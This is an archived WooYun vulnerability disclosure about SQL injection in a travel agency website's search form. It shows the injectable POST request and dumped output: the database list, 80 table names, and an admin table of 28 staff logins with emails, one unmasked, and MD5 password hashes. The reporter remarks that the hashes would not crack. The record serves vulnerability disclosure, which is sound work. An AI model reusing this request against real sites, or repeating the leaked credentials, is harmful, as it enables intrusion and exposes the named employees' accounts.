乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-24: 细节已通知厂商并且等待厂商处理中 2015-12-24: 厂商已经确认,细节仅向厂商公开 2016-01-03: 细节向核心白帽子及相关领域专家公开 2016-01-13: 细节向普通白帽子公开 2016-01-23: 细节向实习白帽子公开 2016-02-07: 细节向公众公开
post包
POST /chinese/01_journey/04_search.php HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/chinese/01_journey/04_search.phpCookie: __utma=113860241.1082451763.1450776169.1450776169.1450776169.1; __utmb=113860**.**.**.**0776169; __utmc=113860241; __utmz=113860241.1450776169.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; __utmt=1; PHPSESSID=deb8c8aceb9c2281ed6c446eeee30eddConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 58xstart=2015-12-22&xend=2016-01-22&ta11=1&ta12=4&xhotkey=27
available databases [5]:[*] gabriel[*] information_schema[*] mysql[*] phpmyadmin[*] test
Database: gabriel[80 tables]+-----------------------+| admin_tb || application_tb || common_tb || contact_tb || date_tb || group_enable || group_tb || icon_tb || level_date_app || level_date_caty || level_sort_app || level_sort_caty || sort_tb || subject_tb || system_tb || tracking_tb || tw_about_tb || tw_agency_member || tw_agency_tb || tw_airplane_flight || tw_airplane_tb || tw_announcement_files || tw_announcement_tb || tw_area_app || tw_area_caty || tw_area_info || tw_board_tb || tw_business_tb || tw_contact_tb || tw_contractbook_tb || tw_country_app || tw_country_caty || tw_demand_tb || tw_department_tb || tw_download_app || tw_download_caty || tw_faq_tb || tw_hope_tb || tw_hotkey_relation || tw_hotkey_tb || tw_indexcard_link || tw_indexcard_tb || tw_indexcut_tb || tw_indexflash2_tb || tw_inquiry_contact || tw_inquiry_contact2 || tw_inquiry_subject || tw_inquiry_subject2 || tw_library_app || tw_library_caty || tw_library_files || tw_link_app || tw_link_caty || tw_page_tb || tw_picdata_tb || tw_promotion_flash || tw_promotion_relation || tw_promotion_tb || tw_report_area || tw_report_product || tw_report_reason || tw_report_target || tw_report_tb || tw_report_type || tw_sale_tb || tw_subject_tb || tw_target_tb || tw_trip_app || tw_trip_card || tw_trip_caty || tw_trip_days || tw_trip_editor || tw_trip_flash || tw_trip_relation || tw_trip_sign || tw_trip_times || tw_trip_times_air || tw_tripcode_tb || tw_triptype_tb || tw_zone_tb |+-----------------------+
涉及28个后台管理员
Table: admin_tb[28 entries]+----------+-----+---------------------+------------+-------------------------------+---------+------------------+----------+--------+----------------------------------+| fgroupid | pid | xcredate | xdesc | xemail | xenable | xfolderauthority | xloginid | xname | xpasswd |+----------+-----+---------------------+------------+-------------------------------+---------+------------------+----------+--------+----------------------------------+| 1 | 1 | 0000-00-00 00:00:00 | ???<??>?? | Nine@**.**.**.** | yes | no | root | Nine | 62c4707e05c32c4287ff09c402623680 || 6 | 124 | 2009-07-27 10:06:10 | ??????? | System@**.**.**.** | yes | yes | System | System | a08da3e47ec0eb2bd6658d10e27e338d || 2 | 128 | 2009-09-23 17:54:54 | ???? | benny.chen@**.**.**.** | no | yes | benny | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 2 | 129 | 2009-09-23 17:57:03 | ???? | george.chiang@**.**.**.**.tw | no | yes | george | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 2 | 130 | 2009-09-23 18:01:42 | ?? | pangyi.wen@**.**.**.** | no | yes | pangyi | ??? | 4e349720ad9a55128d7909e5cc3e60ff || 12 | 131 | 2009-10-06 18:02:00 | OP | candy.lin@**.**.**.** | no | yes | candy | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 12 | 134 | 2009-11-03 10:26:28 | ?? | marlene.lo@**.**.**.** | no | yes | marlene | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 6 | 136 | 2009-12-25 14:11:34 | ?? | ruru.huang@**.**.**.** | no | yes | rururu | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 2 | 138 | 2010-11-24 18:40:42 | ??? | aron.huang@**.**.**.** | yes | yes | aron | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 2 | 140 | 2011-01-17 09:22:39 | ???? | alex.money@**.**.**.** | yes | yes | money | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 6 | 141 | 2011-02-25 13:07:55 | ????? | anny.fang@**.**.**.** | yes | yes | anny | ??? | 09affde7f1494ee2b654daa1a68d5064 || 2 | 142 | 2011-03-10 14:25:06 | ??? | lucilla.wang@galilee-tour.com | no | yes | gabriel | ??? | 18185e22e754cb0204f7a750a8a51419 || 10 | 143 | 2011-03-22 11:10:19 | ???? | vivian.lin@**.**.**.** | no | yes | vivian | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 16 | 144 | 2011-05-03 11:33:15 | ?????? | peijie.wu@**.**.**.** | no | yes | peijie | Jie | 419b6fbcfa4c8e262d62157efb5ebd9d || 12 | 145 | 2011-05-10 12:27:10 | ?? | maki.wang@**.**.**.** | no | yes | maki | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 12 | 146 | 2011-05-10 12:28:40 | ?? | ivy.hung@**.**.**.** | yes | yes | ivyhung | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 10 | 147 | 2011-05-10 12:30:39 | ???? | aga.syu@**.**.**.** | no | yes | agasyu | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 2 | 148 | 2011-08-08 13:42:00 | ???? | clement.chen@**.**.**.**.tw | yes | yes | Clement | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 16 | 149 | 2015-03-05 07:40:56 | ?????? | april.lee@**.**.**.** | yes | yes | aprillee | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 19 | 150 | 2015-03-06 01:47:57 | ???????? | hugh.chen@**.**.**.** | yes | yes | hugh | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 2 | 151 | 2015-03-09 05:58:23 | ???? | hank.chen@**.**.**.** | yes | yes | hank | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 13 | 152 | 2015-03-10 02:00:19 | ?? | student@**.**.**.** | no | yes | vinna | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 14 | 153 | 2015-03-23 06:46:24 | ?????? | zoey.lin@**.**.**.** | yes | yes | zoey | ??? | 82dd4ea44035ea7bf485912369f0bced || 15 | 154 | 2015-04-08 03:54:11 | ??? | ken.lee@**.**.**.** | yes | yes | kenlee | ?? | 419b6fbcfa4c8e262d62157efb5ebd9d || 17 | 155 | 2015-05-04 09:41:17 | ?????????? | royce@**.**.**.** | no | yes | viewer | ?????? | ef48c094475c01574d2469487f5c6acf || 16 | 156 | 2015-05-25 10:05:10 | ?????????? | kimi.chen@**.**.**.** | yes | yes | kimi | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 16 | 157 | 2015-08-03 01:53:56 | ?????????? | iris.huang@**.**.**.** | yes | yes | Iris | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d || 18 | 158 | 2015-12-07 02:29:24 | ??? | winslet.wen@**.**.**.** | yes | yes | winslet | ??? | 419b6fbcfa4c8e262d62157efb5ebd9d |+----------+-----+---------------------+------------+-------------------------------+---------+------------------+----------+--------+----------------------------------+
居然解不了密 坑爹
危害等级:高
漏洞Rank:17
确认时间:2015-12-24 19:12
感謝通報
暂无